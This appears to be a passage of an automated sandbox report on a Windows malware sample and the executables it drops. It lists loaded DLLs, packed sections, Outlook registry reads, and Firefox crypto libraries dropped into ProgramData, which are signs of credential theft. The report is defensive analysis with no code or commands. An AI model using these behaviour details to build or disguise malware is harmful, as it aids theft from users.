Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Section loaded: winmm.dll
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Section loaded: wininet.dll
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Section loaded: sspicli.dll
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Section loaded: mstask.dll
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Section loaded: wldp.dll
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Section loaded: mpr.dll
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Section loaded: dui70.dll
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Section loaded: duser.dll
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Section loaded: chartv.dll
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Section loaded: oleacc.dll
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Section loaded: atlthunk.dll
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Section loaded: wintypes.dll
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Section loaded: wintypes.dll
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Section loaded: wintypes.dll
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Section loaded: wtsapi32.dll
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Section loaded: winsta.dll
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Section loaded: textshaping.dll
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Section loaded: propsys.dll
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Section loaded: explorerframe.dll
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Section loaded: iertutil.dll
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Section loaded: profapi.dll
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Section loaded: edputil.dll
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Section loaded: urlmon.dll
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Section loaded: srvcli.dll
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Section loaded: netutils.dll
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Section loaded: appresolver.dll
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Section loaded: slc.dll
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Section loaded: userenv.dll
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Section loaded: sppc.dll
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Section loaded: sspicli.dll

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: Google Drive.lnk.2.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.2.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.2.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.2.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.2.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.2.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: file.exe

Static file information: File size 1816064 > 1048576

Source: file.exe

Static PE information: Raw size of juusqcgn is bigger than: 0x100000 < 0x1a1a00

Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2580964214.000000006C6BD000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2581557840.000000006C87F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.2581557840.000000006C87F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: a0969106aa.exe, 0000001C.00000003.2941381485.0000000004750000.00000004.00001000.00020000.00000000.sdmp, a0969106aa.exe, 0000001C.00000002.3075139523.0000000000D42000.00000040.00000001.01000000.00000010.sdmp, a0969106aa.exe, 0000001E.00000003.3098995666.00000000052D0000.00000004.00001000.00020000.00000000.sdmp, a0969106aa.exe, 0000001E.00000002.3139269920.0000000000D42000.00000040.00000001.01000000.00000010.sdmp, a0969106aa.exe, 0000001F.00000003.3230672067.0000000005370000.00000004.00001000.00020000.00000000.sdmp, a0969106aa.exe, 0000001F.00000002.3270869703.0000000000D42000.00000040.00000001.01000000.00000010.sdmp
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2580964214.000000006C6BD000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 0.2.file.exe.d30000.0.unpack :EW;.rsrc :W;.idata :W; :EW;juusqcgn:EW;nciomklg:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;juusqcgn:EW;nciomklg:EW;.taggant:EW;
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Unpacked PE file: 21.2.DocumentsHCFBFBAEBK.exe.840000.0.unpack :EW;.rsrc:W;.idata :W;vosxtpoy:EW;nqcvauwq:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;vosxtpoy:EW;nqcvauwq:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 22.2.skotes.exe.160000.0.unpack :EW;.rsrc:W;.idata :W;vosxtpoy:EW;nqcvauwq:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;vosxtpoy:EW;nqcvauwq:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 23.2.skotes.exe.160000.0.unpack :EW;.rsrc:W;.idata :W;vosxtpoy:EW;nqcvauwq:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;vosxtpoy:EW;nqcvauwq:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Unpacked PE file: 24.2.6fc7e371fe.exe.c80000.0.unpack :EW;.rsrc :W;.idata :W; :EW;juusqcgn:EW;nciomklg:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;juusqcgn:EW;nciomklg:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Unpacked PE file: 27.2.6fc7e371fe.exe.c80000.0.unpack :EW;.rsrc :W;.idata :W; :EW;juusqcgn:EW;nciomklg:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;juusqcgn:EW;nciomklg:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Unpacked PE file: 28.2.a0969106aa.exe.d40000.0.unpack :EW;.rsrc:W;.idata :W;rfbmunfc:EW;iqxhhqxy:EW;.taggant:EW; vs :ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Unpacked PE file: 29.2.6fc7e371fe.exe.c80000.0.unpack :EW;.rsrc :W;.idata :W; :EW;juusqcgn:EW;nciomklg:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;juusqcgn:EW;nciomklg:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Unpacked PE file: 30.2.a0969106aa.exe.d40000.0.unpack :EW;.rsrc:W;.idata :W;rfbmunfc:EW;iqxhhqxy:EW;.taggant:EW; vs :ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Unpacked PE file: 31.2.a0969106aa.exe.d40000.0.unpack :EW;.rsrc:W;.idata :W;rfbmunfc:EW;iqxhhqxy:EW;.taggant:EW; vs :ER;.rsrc:W;

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C6AC410 LoadLibraryW,GetProcAddress,FreeLibrary,

0_2_6C6AC410

Entry point lies outside standard sections

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

PE file contains an invalid checksum

Source: DocumentsHCFBFBAEBK.exe.0.dr	Static PE information: real checksum: 0x310b43 should be: 0x3131a1
Source: file.exe	Static PE information: real checksum: 0x1bfe46 should be: 0x1c4469
Source: random[1].exe.0.dr	Static PE information: real checksum: 0x1bfe46 should be: 0x1c4469
Source: skotes.exe.21.dr	Static PE information: real checksum: 0x310b43 should be: 0x3131a1

PE file contains sections with non-standard names

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: juusqcgn
Source: file.exe	Static PE information: section name: nciomklg
Source: file.exe	Static PE information: section name: .taggant
Source: DocumentsHCFBFBAEBK.exe.0.dr	Static PE information: section name:
Source: DocumentsHCFBFBAEBK.exe.0.dr	Static PE information: section name: .idata
Source: DocumentsHCFBFBAEBK.exe.0.dr	Static PE information: section name: vosxtpoy
Source: DocumentsHCFBFBAEBK.exe.0.dr	Static PE information: section name: nqcvauwq
Source: DocumentsHCFBFBAEBK.exe.0.dr	Static PE information: section name: .taggant
Source: random[1].exe.0.dr	Static PE information: section name:
Source: random[1].exe.0.dr	Static PE information: section name: .rsrc
Source: random[1].exe.0.dr	Static PE information: section name: .idata
Source: random[1].exe.0.dr	Static PE information: section name:
Source: random[1].exe.0.dr	Static PE information: section name: juusqcgn
Source: random[1].exe.0.dr	Static PE information: section name: nciomklg
Source: random[1].exe.0.dr	Static PE information: section name: .taggant
Source: freebl3.dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr	Static PE information: section name: .didat
Source: nss3.dll.0.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: skotes.exe.21.dr	Static PE information: section name:
Source: skotes.exe.21.dr	Static PE information: section name: .idata
Source: skotes.exe.21.dr	Static PE information: section name: vosxtpoy
Source: skotes.exe.21.dr	Static PE information: section name: nqcvauwq
Source: skotes.exe.21.dr	Static PE information: section name: .taggant

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C67B536 push ecx; ret	0_2_6C67B549
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Code function: 21_2_0085D91C push ecx; ret	21_2_0085D92F
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Code function: 21_2_00851359 push es; ret	21_2_0085135A
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 22_2_0017D91C push ecx; ret	22_2_0017D92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 23_2_0017D91C push ecx; ret	23_2_0017D92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 23_2_0017DFC6 push ecx; ret	23_2_0017DFD9

Source: file.exe	Static PE information: section name: juusqcgn entropy: 7.954433207913269
Source: DocumentsHCFBFBAEBK.exe.0.dr	Static PE information: section name: entropy: 7.060847869629145
Source: random[1].exe.0.dr	Static PE information: section name: juusqcgn entropy: 7.954433207913269
Source: skotes.exe.21.dr	Static PE information: section name: entropy: 7.060847869629145

Persistence and Installation Behavior

Drops PE files to the document folder of the user

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\DocumentsHCFBFBAEBK.exe

Jump to dropped file

Drops PE files

Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\DocumentsHCFBFBAEBK.exe	Jump to dropped file

Drops PE files to the application program directory (C:\ProgramData)

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
